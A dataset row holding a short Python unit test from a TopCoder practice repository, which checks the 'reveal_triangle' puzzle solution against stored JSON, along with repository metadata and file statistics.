5e1f6ce0a9337d65cbe42ed7ca5ab5237ddf50b6 | 170 | py | Python | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | [
"MIT"
] | 1 | 2017-03-25T17:40:57.000Z | 2017-03-25T17:40:57.000Z | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | [
"MIT"
] | null | null | null | test/test_reveal_triangle.py | erichaase/topcoder-python | de285d8092a94f2ec1b5c0c33eba55b5c27a5390 | [
"MIT"
] | null | null | null | from test.assert_json import assert_json
from topcoder.reveal_triangle import solution
def test_reveal_triangle ():
assert_json('reveal_triangle', solution)
| 28.333333 | 48 | 0.788235 | 22 | 170 | 5.772727 | 0.454545 | 0.23622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152941 | 170 | 5 | 49 | 34 | 0.881944 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.